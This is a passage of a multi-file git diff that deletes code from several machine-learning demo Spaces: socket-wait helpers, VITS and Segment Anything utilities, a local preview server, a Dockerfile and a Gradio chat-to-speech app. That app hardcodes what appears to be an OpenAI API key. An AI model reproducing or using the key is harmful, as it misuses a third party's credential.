- def _retry_on_intr(fn, timeout): - if timeout is None: - deadline = float("inf") - else: - deadline = monotonic() + timeout - - while True: - try: - return fn(timeout) - # OSError for 3 <= pyver < 3.5, select.error for pyver <= 2.7 - except (OSError, select.error) as e: - # 'e.args[0]' incantation works for both OSError and select.error - if e.args[0] != errno.EINTR: - raise - else: - timeout = deadline - monotonic() - if timeout < 0: - timeout = 0 - if timeout == float("inf"): - timeout = None - continue - - -def select_wait_for_socket(sock, read=False, write=False, timeout=None): - if not read and not write: - raise RuntimeError("must specify at least one of read=True, write=True") - rcheck = [] - wcheck = [] - if read: - rcheck.append(sock) - if write: - wcheck.append(sock) - # When doing a non-blocking connect, most systems signal success by - # marking the socket writable. Windows, though, signals success by marked - # it as "exceptional". We paper over the difference by checking the write - # sockets for both conditions. (The stdlib selectors module does the same - # thing.) - fn = partial(select.select, rcheck, wcheck, wcheck) - rready, wready, xready = _retry_on_intr(fn, timeout) - return bool(rready or wready or xready) - - -def poll_wait_for_socket(sock, read=False, write=False, timeout=None): - if not read and not write: - raise RuntimeError("must specify at least one of read=True, write=True") - mask = 0 - if read: - mask |= select.POLLIN - if write: - mask |= select.POLLOUT - poll_obj = select.poll() - poll_obj.register(sock, mask) - - # For some reason, poll() takes timeout in milliseconds - def do_poll(t): - if t is not None: - t *= 1000 - return poll_obj.poll(t) - - return bool(_retry_on_intr(do_poll, timeout)) - - -def null_wait_for_socket(*args, **kwargs): - raise NoWayToWaitForSocketError("no select-equivalent available") - - -def _have_working_poll(): - # Apparently some systems have a select.poll that fails as soon as you try - # to use it, either due to strange configuration or broken monkeypatching - # from libraries like eventlet/greenlet. - try: - poll_obj = select.poll() - _retry_on_intr(poll_obj.poll, 0) - except (AttributeError, OSError): - return False - else: - return True - - -def wait_for_socket(*args, **kwargs): - # We delay choosing which implementation to use until the first time we're - # called. We could do it at import time, but then we might make the wrong - # decision if someone goes wild with monkeypatching select.poll after - # we're imported. - global wait_for_socket - if _have_working_poll(): - wait_for_socket = poll_wait_for_socket - elif hasattr(select, "select"): - wait_for_socket = select_wait_for_socket - else: # Platform-specific: Appengine. - wait_for_socket = null_wait_for_socket - return wait_for_socket(*args, **kwargs) - - -def wait_for_read(sock, timeout=None): - """Waits for reading to be available on a given socket. - Returns True if the socket is readable, or False if the timeout expired. - """ - return wait_for_socket(sock, read=True, timeout=timeout) - - -def wait_for_write(sock, timeout=None): - """Waits for writing to be available on a given socket. - Returns True if the socket is readable, or False if the timeout expired. 
- """ - return wait_for_socket(sock, write=True, timeout=timeout) diff --git a/spaces/CForGETaass/vits-uma-genshin-honkai/utils.py b/spaces/CForGETaass/vits-uma-genshin-honkai/utils.py deleted file mode 100644 index ee4b01ddfbe8173965371b29f770f3e87615fe71..0000000000000000000000000000000000000000 --- a/spaces/CForGETaass/vits-uma-genshin-honkai/utils.py +++ /dev/null @@ -1,225 +0,0 @@ -import os -import sys -import argparse -import logging -import json -import subprocess -import numpy as np -import librosa -import torch - -MATPLOTLIB_FLAG = False - -logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) -logger = logging - - -def load_checkpoint(checkpoint_path, model, optimizer=None): - assert os.path.isfile(checkpoint_path) - checkpoint_dict = torch.load(checkpoint_path, map_location='cpu') - iteration = checkpoint_dict['iteration'] - learning_rate = checkpoint_dict['learning_rate'] - if optimizer is not None: - optimizer.load_state_dict(checkpoint_dict['optimizer']) - saved_state_dict = checkpoint_dict['model'] - if hasattr(model, 'module'): - state_dict = model.module.state_dict() - else: - state_dict = model.state_dict() - new_state_dict= {} - for k, v in state_dict.items(): - try: - new_state_dict[k] = saved_state_dict[k] - except: - logger.info("%s is not in the checkpoint" % k) - new_state_dict[k] = v - if hasattr(model, 'module'): - model.module.load_state_dict(new_state_dict) - else: - model.load_state_dict(new_state_dict) - logger.info("Loaded checkpoint '{}' (iteration {})" .format( - checkpoint_path, iteration)) - return model, optimizer, learning_rate, iteration - - -def plot_spectrogram_to_numpy(spectrogram): - global MATPLOTLIB_FLAG - if not MATPLOTLIB_FLAG: - import matplotlib - matplotlib.use("Agg") - MATPLOTLIB_FLAG = True - mpl_logger = logging.getLogger('matplotlib') - mpl_logger.setLevel(logging.WARNING) - import matplotlib.pylab as plt - import numpy as np - - fig, ax = plt.subplots(figsize=(10,2)) - im = ax.imshow(spectrogram, aspect="auto", origin="lower", - interpolation='none') - plt.colorbar(im, ax=ax) - plt.xlabel("Frames") - plt.ylabel("Channels") - plt.tight_layout() - - fig.canvas.draw() - data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='') - data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) - plt.close() - return data - - -def plot_alignment_to_numpy(alignment, info=None): - global MATPLOTLIB_FLAG - if not MATPLOTLIB_FLAG: - import matplotlib - matplotlib.use("Agg") - MATPLOTLIB_FLAG = True - mpl_logger = logging.getLogger('matplotlib') - mpl_logger.setLevel(logging.WARNING) - import matplotlib.pylab as plt - import numpy as np - - fig, ax = plt.subplots(figsize=(6, 4)) - im = ax.imshow(alignment.transpose(), aspect='auto', origin='lower', - interpolation='none') - fig.colorbar(im, ax=ax) - xlabel = 'Decoder timestep' - if info is not None: - xlabel += '\n\n' + info - plt.xlabel(xlabel) - plt.ylabel('Encoder timestep') - plt.tight_layout() - - fig.canvas.draw() - data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='') - data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) - plt.close() - return data - - -def load_audio_to_torch(full_path, target_sampling_rate): - audio, sampling_rate = librosa.load(full_path, sr=target_sampling_rate, mono=True) - return torch.FloatTensor(audio.astype(np.float32)) - - -def load_filepaths_and_text(filename, split="|"): - with open(filename, encoding='utf-8') as f: - filepaths_and_text = [line.strip().split(split) for line in f] - return filepaths_and_text - - 
-def get_hparams(init=True): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', type=str, default="./configs/base.json", - help='JSON file for configuration') - parser.add_argument('-m', '--model', type=str, required=True, - help='Model name') - - args = parser.parse_args() - model_dir = os.path.join("./logs", args.model) - - if not os.path.exists(model_dir): - os.makedirs(model_dir) - - config_path = args.config - config_save_path = os.path.join(model_dir, "config.json") - if init: - with open(config_path, "r") as f: - data = f.read() - with open(config_save_path, "w") as f: - f.write(data) - else: - with open(config_save_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams = HParams(**config) - hparams.model_dir = model_dir - return hparams - - -def get_hparams_from_dir(model_dir): - config_save_path = os.path.join(model_dir, "config.json") - with open(config_save_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams =HParams(**config) - hparams.model_dir = model_dir - return hparams - - -def get_hparams_from_file(config_path): - with open(config_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams =HParams(**config) - return hparams - - -def check_git_hash(model_dir): - source_dir = os.path.dirname(os.path.realpath(__file__)) - if not os.path.exists(os.path.join(source_dir, ".git")): - logger.warn("{} is not a git repository, therefore hash value comparison will be ignored.".format( - source_dir - )) - return - - cur_hash = subprocess.getoutput("git rev-parse HEAD") - - path = os.path.join(model_dir, "githash") - if os.path.exists(path): - saved_hash = open(path).read() - if saved_hash != cur_hash: - logger.warn("git hash values are different. {}(saved) != {}(current)".format( - saved_hash[:8], cur_hash[:8])) - else: - open(path, "w").write(cur_hash) - - -def get_logger(model_dir, filename="train.log"): - global logger - logger = logging.getLogger(os.path.basename(model_dir)) - logger.setLevel(logging.DEBUG) - - formatter = logging.Formatter("%(asctime)s\t%(name)s\t%(levelname)s\t%(message)s") - if not os.path.exists(model_dir): - os.makedirs(model_dir) - h = logging.FileHandler(os.path.join(model_dir, filename)) - h.setLevel(logging.DEBUG) - h.setFormatter(formatter) - logger.addHandler(h) - return logger - - -class HParams(): - def __init__(self, **kwargs): - for k, v in kwargs.items(): - if type(v) == dict: - v = HParams(**v) - self[k] = v - - def keys(self): - return self.__dict__.keys() - - def items(self): - return self.__dict__.items() - - def values(self): - return self.__dict__.values() - - def __len__(self): - return len(self.__dict__) - - def __getitem__(self, key): - return getattr(self, key) - - def __setitem__(self, key, value): - return setattr(self, key, value) - - def __contains__(self, key): - return key in self.__dict__ - - def __repr__(self): - return self.__dict__.__repr__() diff --git a/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/segment_anything/utils/transforms.py b/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/segment_anything/utils/transforms.py deleted file mode 100644 index 3ad346661f84b0647026e130a552c4b38b83e2ac..0000000000000000000000000000000000000000 --- a/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/segment_anything/utils/transforms.py +++ /dev/null @@ -1,102 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. - -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. 
- -import numpy as np -import torch -from torch.nn import functional as F -from torchvision.transforms.functional import resize, to_pil_image # type: ignore - -from copy import deepcopy -from typing import Tuple - - -class ResizeLongestSide: - """ - Resizes images to longest side 'target_length', as well as provides - methods for resizing coordinates and boxes. Provides methods for - transforming both numpy array and batched torch tensors. - """ - - def __init__(self, target_length: int) -> None: - self.target_length = target_length - - def apply_image(self, image: np.ndarray) -> np.ndarray: - """ - Expects a numpy array with shape HxWxC in uint8 format. - """ - target_size = self.get_preprocess_shape(image.shape[0], image.shape[1], self.target_length) - return np.array(resize(to_pil_image(image), target_size)) - - def apply_coords(self, coords: np.ndarray, original_size: Tuple[int, ...]) -> np.ndarray: - """ - Expects a numpy array of length 2 in the final dimension. Requires the - original image size in (H, W) format. - """ - old_h, old_w = original_size - new_h, new_w = self.get_preprocess_shape( - original_size[0], original_size[1], self.target_length - ) - coords = deepcopy(coords).astype(float) - coords[..., 0] = coords[..., 0] * (new_w / old_w) - coords[..., 1] = coords[..., 1] * (new_h / old_h) - return coords - - def apply_boxes(self, boxes: np.ndarray, original_size: Tuple[int, ...]) -> np.ndarray: - """ - Expects a numpy array shape Bx4. Requires the original image size - in (H, W) format. - """ - boxes = self.apply_coords(boxes.reshape(-1, 2, 2), original_size) - return boxes.reshape(-1, 4) - - def apply_image_torch(self, image: torch.Tensor) -> torch.Tensor: - """ - Expects batched images with shape BxCxHxW and float format. This - transformation may not exactly match apply_image. apply_image is - the transformation expected by the model. - """ - # Expects an image in BCHW format. May not exactly match apply_image. - target_size = self.get_preprocess_shape(image.shape[0], image.shape[1], self.target_length) - return F.interpolate( - image, target_size, mode="bilinear", align_corners=False, antialias=True - ) - - def apply_coords_torch( - self, coords: torch.Tensor, original_size: Tuple[int, ...] - ) -> torch.Tensor: - """ - Expects a torch tensor with length 2 in the last dimension. Requires the - original image size in (H, W) format. - """ - old_h, old_w = original_size - new_h, new_w = self.get_preprocess_shape( - original_size[0], original_size[1], self.target_length - ) - coords = deepcopy(coords).to(torch.float) - coords[..., 0] = coords[..., 0] * (new_w / old_w) - coords[..., 1] = coords[..., 1] * (new_h / old_h) - return coords - - def apply_boxes_torch( - self, boxes: torch.Tensor, original_size: Tuple[int, ...] - ) -> torch.Tensor: - """ - Expects a torch tensor with shape Bx4. Requires the original image - size in (H, W) format. - """ - boxes = self.apply_coords_torch(boxes.reshape(-1, 2, 2), original_size) - return boxes.reshape(-1, 4) - - @staticmethod - def get_preprocess_shape(oldh: int, oldw: int, long_side_length: int) -> Tuple[int, int]: - """ - Compute the output size given input size and target long side length. 
- """ - scale = long_side_length * 1.0 / max(oldh, oldw) - newh, neww = oldh * scale, oldw * scale - neww = int(neww + 0.5) - newh = int(newh + 0.5) - return (newh, neww) diff --git a/spaces/Cat125/text-generator-v3/classes.py b/spaces/Cat125/text-generator-v3/classes.py deleted file mode 100644 index c14da7c59c362806097db38804f1942b31a37fad..0000000000000000000000000000000000000000 --- a/spaces/Cat125/text-generator-v3/classes.py +++ /dev/null @@ -1,28 +0,0 @@ -# import pymorphy3 - -# morph = pymorphy3.MorphAnalyzer() - -# The Token class takes in a token, previous token, text, all tokens, token index, and a boolean value and creates a -# token object with attributes such as score and contexts. -class Token: - def __init__(self, token, prev_token, text, tokens, i, turbo = False): - self.token = token - self.prev_token = prev_token - self.score = 0 - self.contexts = [] - for t in tokens[i-10:i+10]: - # if turbo: - self.contexts.append(t) - # continue - # result = morph.parse(w) - # if len(result) == 0: - # continue - # result = result[0] - # if 'LATN' in result.tag: - # continue - # if result.tag.POS == 'NOUN': - # self.contexts.append(t) - # self.contexts.append(result.normal_form) - - def __repr__(self): - return f"'{self.prev_token} > {self.token} ({len(self.contexts)} contexts)'" \ No newline at end of file diff --git a/spaces/Cat125/text-generator-v3/train.py b/spaces/Cat125/text-generator-v3/train.py deleted file mode 100644 index 8f22f6003a95565cbf5835165e962cf43509a558..0000000000000000000000000000000000000000 --- a/spaces/Cat125/text-generator-v3/train.py +++ /dev/null @@ -1,65 +0,0 @@ -import argparse -import re -from pprint import pprint - -from tokenizers import Tokenizer -from tqdm import trange - -from classes import Token -from datamanager import get_data, get_texts, models, set_data, set_data_v3 - -turbo = False -tokenizer = Tokenizer.from_pretrained("bert-base-uncased") - -def process_text(db, db3, text): - tokens = tokenizer.encode(text).ids - for i in trange(0, len(tokens), colour="green", unit="tokens"): - token = tokens[i] - prev_token = 0 if i == 0 else tokens[i - 1] - t = Token(token, prev_token, text, tokens, turbo) - if t not in db: - db.append(t) - if prev_token not in db3: - db3[prev_token] = [] - db3[prev_token].append(t) - -def train(model_name): - db = [] - db3 = {} - print(f'Rebuilding database for "{model_name}"...') - k = 0 - texts = get_texts(model_name) - total_texts = len(texts) - for text in texts: - k += 1 - print(f'Processing text {k} of {total_texts}...') - process_text(db, db3, text) - - set_data(model_name, db) - models[model_name]["db"] = db - set_data_v3(model_name, db3) - models[model_name]["db3"] = db3 - -if __name__ == '__main__': - parser = argparse.ArgumentParser( - prog='Text Generator v3', - description='Generates text from a text file') - parser.add_argument('-r', '--rebuild', action='extend', nargs="+", type=str) - parser.add_argument('-l', '--log', action='extend', nargs="+", type=str) - parser.add_argument('-t', '--turbo', action='store_true') - args = parser.parse_args() - - if args.rebuild: - models_to_rebuild = args.rebuild - if args.rebuild[0] in ('*', 'all'): - models_to_rebuild = list(models.keys()) - for model in models_to_rebuild: - if model not in models: - raise ValueError("Model '%s' not found" % model) - turbo = args.turbo - train(model) - if args.log: - for model in args.log: - if model not in models: - raise ValueError("Model '%s' not found" % model) - pprint(get_data(model)) diff --git 
a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/altair/utils/server.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/altair/utils/server.py deleted file mode 100644 index f2dfc29ec4b5d1cbf37a87fe7ce70fff27b022a5..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/altair/utils/server.py +++ /dev/null @@ -1,148 +0,0 @@ -""" -A Simple server used to show altair graphics from a prompt or script. - -This is adapted from the mpld3 package; see -https://github.com/mpld3/mpld3/blob/master/mpld3/_server.py -""" -import sys -import threading -import webbrowser -import socket -from http import server -from io import BytesIO as IO -import itertools -import random - -JUPYTER_WARNING = """ -Note: if you're in the Jupyter notebook, Chart.serve() is not the best - way to view plots. Consider using Chart.display(). -You must interrupt the kernel to cancel this command. -""" - - -# Mock server used for testing - - -class MockRequest: - def makefile(self, *args, **kwargs): - return IO(b"GET /") - - def sendall(self, response): - pass - - -class MockServer: - def __init__(self, ip_port, Handler): - Handler(MockRequest(), ip_port[0], self) - - def serve_forever(self): - pass - - def server_close(self): - pass - - -def generate_handler(html, files=None): - if files is None: - files = {} - - class MyHandler(server.BaseHTTPRequestHandler): - def do_GET(self): - """Respond to a GET request.""" - if self.path == "/": - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html.encode()) - elif self.path in files: - content_type, content = files[self.path] - self.send_response(200) - self.send_header("Content-type", content_type) - self.end_headers() - self.wfile.write(content.encode()) - else: - self.send_error(404) - - return MyHandler - - -def find_open_port(ip, port, n=50): - """Find an open port near the specified port""" - ports = itertools.chain( - (port + i for i in range(n)), (port + random.randint(-2 * n, 2 * n)) - ) - - for port in ports: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - result = s.connect_ex((ip, port)) - s.close() - if result != 0: - return port - raise ValueError("no open ports found") - - -def serve( - html, - ip="127.0.0.1", - port=8888, - n_retries=50, - files=None, - jupyter_warning=True, - open_browser=True, - http_server=None, -): - """Start a server serving the given HTML, and (optionally) open a browser - - Parameters - ---------- - html : string - HTML to serve - ip : string (default = '127.0.0.1') - ip address at which the HTML will be served. - port : int (default = 8888) - the port at which to serve the HTML - n_retries : int (default = 50) - the number of nearby ports to search if the specified port is in use. - files : dictionary (optional) - dictionary of extra content to serve - jupyter_warning : bool (optional) - if True (default), then print a warning if this is used within Jupyter - open_browser : bool (optional) - if True (default), then open a web browser to the given HTML - http_server : class (optional) - optionally specify an HTTPServer class to use for showing the - figure. The default is Python's basic HTTPServer. 
- """ - port = find_open_port(ip, port, n_retries) - Handler = generate_handler(html, files) - - if http_server is None: - srvr = server.HTTPServer((ip, port), Handler) - else: - srvr = http_server((ip, port), Handler) - - if jupyter_warning: - try: - __IPYTHON__ # noqa - except NameError: - pass - else: - print(JUPYTER_WARNING) - - # Start the server - print("Serving to http://{}:{}/ [Ctrl-C to exit]".format(ip, port)) - sys.stdout.flush() - - if open_browser: - # Use a thread to open a web browser pointing to the server - def b(): - return webbrowser.open("http://{}:{}".format(ip, port)) - - threading.Thread(target=b).start() - - try: - srvr.serve_forever() - except (KeyboardInterrupt, SystemExit): - print("\nstopping Server...") - - srvr.server_close() diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/abc/_sockets.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/abc/_sockets.py deleted file mode 100644 index 6aac5f7c22395759ebe3d5633d2adcf1f4ff1fe5..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/abc/_sockets.py +++ /dev/null @@ -1,160 +0,0 @@ -from __future__ import annotations - -import socket -from abc import abstractmethod -from contextlib import AsyncExitStack -from io import IOBase -from ipaddress import IPv4Address, IPv6Address -from socket import AddressFamily -from typing import ( - Any, - Callable, - Collection, - Mapping, - Tuple, - TypeVar, - Union, -) - -from .._core._tasks import create_task_group -from .._core._typedattr import ( - TypedAttributeProvider, - TypedAttributeSet, - typed_attribute, -) -from ._streams import ByteStream, Listener, UnreliableObjectStream -from ._tasks import TaskGroup - -IPAddressType = Union[str, IPv4Address, IPv6Address] -IPSockAddrType = Tuple[str, int] -SockAddrType = Union[IPSockAddrType, str] -UDPPacketType = Tuple[bytes, IPSockAddrType] -T_Retval = TypeVar("T_Retval") - - -class SocketAttribute(TypedAttributeSet): - #: the address family of the underlying socket - family: AddressFamily = typed_attribute() - #: the local socket address of the underlying socket - local_address: SockAddrType = typed_attribute() - #: for IP addresses, the local port the underlying socket is bound to - local_port: int = typed_attribute() - #: the underlying stdlib socket object - raw_socket: socket.socket = typed_attribute() - #: the remote address the underlying socket is connected to - remote_address: SockAddrType = typed_attribute() - #: for IP addresses, the remote port the underlying socket is connected to - remote_port: int = typed_attribute() - - -class _SocketProvider(TypedAttributeProvider): - @property - def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: - from .._core._sockets import convert_ipv6_sockaddr as convert - - attributes: dict[Any, Callable[[], Any]] = { - SocketAttribute.family: lambda: self._raw_socket.family, - SocketAttribute.local_address: lambda: convert( - self._raw_socket.getsockname() - ), - SocketAttribute.raw_socket: lambda: self._raw_socket, - } - try: - peername: tuple[str, int] | None = convert(self._raw_socket.getpeername()) - except OSError: - peername = None - - # Provide the remote address for connected sockets - if peername is not None: - attributes[SocketAttribute.remote_address] = lambda: peername - - # Provide local and remote ports for IP based sockets - if self._raw_socket.family in (AddressFamily.AF_INET, AddressFamily.AF_INET6): - attributes[ - SocketAttribute.local_port - ] = lambda: 
self._raw_socket.getsockname()[1] - if peername is not None: - remote_port = peername[1] - attributes[SocketAttribute.remote_port] = lambda: remote_port - - return attributes - - @property - @abstractmethod - def _raw_socket(self) -> socket.socket: - pass - - -class SocketStream(ByteStream, _SocketProvider): - """ - Transports bytes over a socket. - - Supports all relevant extra attributes from :class:`~SocketAttribute`. - """ - - -class UNIXSocketStream(SocketStream): - @abstractmethod - async def send_fds(self, message: bytes, fds: Collection[int | IOBase]) -> None: - """ - Send file descriptors along with a message to the peer. - - :param message: a non-empty bytestring - :param fds: a collection of files (either numeric file descriptors or open file or socket - objects) - """ - - @abstractmethod - async def receive_fds(self, msglen: int, maxfds: int) -> tuple[bytes, list[int]]: - """ - Receive file descriptors along with a message from the peer. - - :param msglen: length of the message to expect from the peer - :param maxfds: maximum number of file descriptors to expect from the peer - :return: a tuple of (message, file descriptors) - """ - - -class SocketListener(Listener[SocketStream], _SocketProvider): - """ - Listens to incoming socket connections. - - Supports all relevant extra attributes from :class:`~SocketAttribute`. - """ - - @abstractmethod - async def accept(self) -> SocketStream: - """Accept an incoming connection.""" - - async def serve( - self, - handler: Callable[[SocketStream], Any], - task_group: TaskGroup | None = None, - ) -> None: - async with AsyncExitStack() as exit_stack: - if task_group is None: - task_group = await exit_stack.enter_async_context(create_task_group()) - - while True: - stream = await self.accept() - task_group.start_soon(handler, stream) - - -class UDPSocket(UnreliableObjectStream[UDPPacketType], _SocketProvider): - """ - Represents an unconnected UDP socket. - - Supports all relevant extra attributes from :class:`~SocketAttribute`. - """ - - async def sendto(self, data: bytes, host: str, port: int) -> None: - """Alias for :meth:`~.UnreliableObjectSendStream.send` ((data, (host, port))).""" - return await self.send((data, (host, port))) - - -class ConnectedUDPSocket(UnreliableObjectStream[bytes], _SocketProvider): - """ - Represents an connected UDP socket. - - Supports all relevant extra attributes from :class:`~SocketAttribute`. 
- """ diff --git a/spaces/Dagfinn1962/prodia2/flipper.py b/spaces/Dagfinn1962/prodia2/flipper.py deleted file mode 100644 index 823edc9f8f6be2de3051710490acc8375a100b3d..0000000000000000000000000000000000000000 --- a/spaces/Dagfinn1962/prodia2/flipper.py +++ /dev/null @@ -1,31 +0,0 @@ -import numpy as np -import gradio as gr - - -def flip_text(x): - return x[::-1] - - -def flip_image(x): - return np.fliplr(x) - - -with gr.Blocks() as demo: - gr.Markdown("Flip text or image files using this demo.") - with gr.Tab("Flip Text"): - text_input = gr.Textbox() - text_output = gr.Textbox() - text_button = gr.Button("Flip") - with gr.Tab("Flip Image"): - with gr.Row(): - image_input = gr.Image() - image_output = gr.Image() - image_button = gr.Button("Flip") - - with gr.Accordion("Open for More!"): - gr.Markdown("Look at me...") - - text_button.click(flip_text, inputs=text_input, outputs=text_output) - image_button.click(flip_image, inputs=image_input, outputs=image_output) - -demo.launch() \ No newline at end of file diff --git a/spaces/Datasculptor/3D-Room-Layout-Estimation_LGT-Net/models/other/init_env.py b/spaces/Datasculptor/3D-Room-Layout-Estimation_LGT-Net/models/other/init_env.py deleted file mode 100644 index 3654f11d0fe7b3f113bcf9af4a7f43807bf31a79..0000000000000000000000000000000000000000 --- a/spaces/Datasculptor/3D-Room-Layout-Estimation_LGT-Net/models/other/init_env.py +++ /dev/null @@ -1,37 +0,0 @@ -""" -@Date: 2021/08/15 -@description: -""" -import random -import torch -import torch.backends.cudnn as cudnn -import numpy as np -import os -import cv2 - - -def init_env(seed, deterministic=False, loader_work_num=0): - # Fix seed - # Python & NumPy - np.random.seed(seed) - random.seed(seed) - os.environ['PYTHONHASHSEED'] = str(seed) - - # PyTorch - torch.manual_seed(seed) # 为CPU设置随机种子 - if torch.cuda.is_available(): - torch.cuda.manual_seed(seed) # 为当前GPU设置随机种子 - torch.cuda.manual_seed_all(seed) # 为所有GPU设置随机种子 - - # cuDNN - if deterministic: - # 复现 - torch.backends.cudnn.benchmark = False - torch.backends.cudnn.deterministic = True # 将这个 flag 置为 True 的话,每次返回的卷积算法将是确定的,即默认算法 - else: - cudnn.benchmark = True # 如果网络的输入数据维度或类型上变化不大,设置true - torch.backends.cudnn.deterministic = False - - # Using multiple threads in Opencv can cause deadlocks - if loader_work_num != 0: - cv2.setNumThreads(0) diff --git a/spaces/DollieHell/pisa/Dockerfile b/spaces/DollieHell/pisa/Dockerfile deleted file mode 100644 index 6c01c09373883afcb4ea34ae2d316cd596e1737b..0000000000000000000000000000000000000000 --- a/spaces/DollieHell/pisa/Dockerfile +++ /dev/null @@ -1,21 +0,0 @@ -FROM node:18-bullseye-slim - -RUN apt-get update && \ - -apt-get install -y git - -RUN git clone https://gitgud.io/khanon/oai-reverse-proxy.git /app - -WORKDIR /app - -RUN npm install - -COPY Dockerfile greeting.md* .env* ./ - -RUN npm run build - -EXPOSE 7860 - -ENV NODE_ENV=production - -CMD [ "npm", "start" ] \ No newline at end of file diff --git a/spaces/DuckyPolice/DeciDiffusion-v1-0/README.md b/spaces/DuckyPolice/DeciDiffusion-v1-0/README.md deleted file mode 100644 index 0754c3e470f91669b1c889092f5f385ec1817beb..0000000000000000000000000000000000000000 --- a/spaces/DuckyPolice/DeciDiffusion-v1-0/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: DeciDiffusion-v1-0 -emoji: 🐨 -colorFrom: purple -colorTo: indigo -sdk: gradio -sdk_version: 3.43.2 -app_file: app.py -pinned: true -disable_embedding: true -inference: true ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at 
end of file diff --git a/spaces/EDGAhab/Paimon-Talking/app.py b/spaces/EDGAhab/Paimon-Talking/app.py deleted file mode 100644 index 6a59e159d38b5c9a8cb59c146bcdcc0b971d1cfe..0000000000000000000000000000000000000000 --- a/spaces/EDGAhab/Paimon-Talking/app.py +++ /dev/null @@ -1,97 +0,0 @@ -import gradio as gr -import os -os.system('cd monotonic_align && python setup.py build_ext --inplace && cd ..') -import torch - -import commons -import utils -from models import SynthesizerTrn -from text.symbols import symbols -from text import text_to_sequence - -import IPython.display as ipd - -import json -import math - -#new imports -import matplotlib.pyplot as plt -import re - -from torch import nn -from torch.nn import functional as F -from torch.utils.data import DataLoader - -from models import SynthesizerTrn -import unicodedata -import openai - -def get_text(text, hps): - text_norm = text_to_sequence(text, hps.data.text_cleaners) - if hps.data.add_blank: - text_norm = commons.intersperse(text_norm, 0) - text_norm = torch.LongTensor(text_norm) - return text_norm - -hps = utils.get_hparams_from_file("configs/biaobei_base.json") - -net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - **hps.model) -_ = net_g.eval() - -_ = utils.load_checkpoint("G_1434000.pth", net_g, None) - -def friend_chat(text, tts_input3): - call_name = "亚托克斯" - openai.api_key = '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' - identity = tts_input3 - start_sequence = '\n'+str(call_name)+':' - restart_sequence = "\nYou: " - all_text = identity + restart_sequence - if 1 == 1: - prompt0 = text #当期prompt - if text == 'quit': - return prompt0 - prompt = identity + prompt0 + start_sequence - - response = openai.Completion.create( - model="text-davinci-003", - prompt=prompt, - temperature=0.5, - max_tokens=1000, - top_p=1.0, - frequency_penalty=0.5, - presence_penalty=0.0, - stop=["\nYou:"] - ) - return response['choices'][0]['text'].strip() - -def sle(text, tts_input3): - text = friend_chat(text, tts_input3).replace('\n','。').replace(' ',',') - return text - -def infer(text,tts_input3): - stn_tst = get_text(sle(text,tts_input3), hps) - with torch.no_grad(): - x_tst = stn_tst.unsqueeze(0) - x_tst_lengths = torch.LongTensor([stn_tst.size(0)]) - audio = net_g.infer(x_tst, x_tst_lengths, noise_scale=.667, noise_scale_w=0.8, length_scale=1)[0][0,0].data.cpu().float().numpy() - sampling_rate = 22050 - return (sampling_rate, audio) - -app = gr.Blocks() - -with app: - with gr.Tabs(): - - with gr.TabItem("Basic"): - - tts_input1 = gr.TextArea(label="输入你想跟剑魔说的话", value="我是暮光星灵佐伊,我要三天之内杀了你") - tts_input3 = gr.TextArea(label="写上你给他的设定", value="你叫亚托克斯,俗称剑魔,世界的终结者。") - tts_submit = gr.Button("Generate", variant="primary") - tts_output2 = gr.Audio(label="Output") - tts_submit.click(infer, [tts_input1,tts_input3], [tts_output2]) - app.launch() \ No newline at end of file diff --git a/spaces/EmbeddedAndrew/examin8/chain.py b/spaces/EmbeddedAndrew/examin8/chain.py deleted file mode 100644 index 898b9fbd59bfc07e5f1f66531118d2eaf01fe328..0000000000000000000000000000000000000000 --- a/spaces/EmbeddedAndrew/examin8/chain.py +++ /dev/null @@ -1,127 +0,0 @@ -import json -import os -import pathlib -from typing import Dict, List, Tuple - -import weaviate -from langchain import OpenAI, PromptTemplate -from langchain.chains import LLMChain -from langchain.chains.base import Chain -from langchain.chains.combine_documents.base import BaseCombineDocumentsChain -from 
langchain.chains.conversation.memory import ConversationBufferMemory -from langchain.chains.question_answering import load_qa_chain -from langchain.embeddings import OpenAIEmbeddings -from langchain.prompts import FewShotPromptTemplate, PromptTemplate -from langchain.prompts.example_selector import \ - SemanticSimilarityExampleSelector -from langchain.vectorstores import FAISS, Weaviate -from pydantic import BaseModel - - -class CustomChain(Chain, BaseModel): - - vstore: Weaviate - chain: BaseCombineDocumentsChain - key_word_extractor: Chain - - @property - def input_keys(self) -> List[str]: - return ["question"] - - @property - def output_keys(self) -> List[str]: - return ["answer"] - - def _call(self, inputs: Dict[str, str]) -> Dict[str, str]: - question = inputs["question"] - chat_history_str = _get_chat_history(inputs["chat_history"]) - if chat_history_str: - new_question = self.key_word_extractor.run( - question=question, chat_history=chat_history_str - ) - else: - new_question = question - print(new_question) - docs = self.vstore.similarity_search(new_question, k=4) - new_inputs = inputs.copy() - new_inputs["question"] = new_question - new_inputs["chat_history"] = chat_history_str - answer, _ = self.chain.combine_docs(docs, **new_inputs) - return {"answer": answer} - - -def 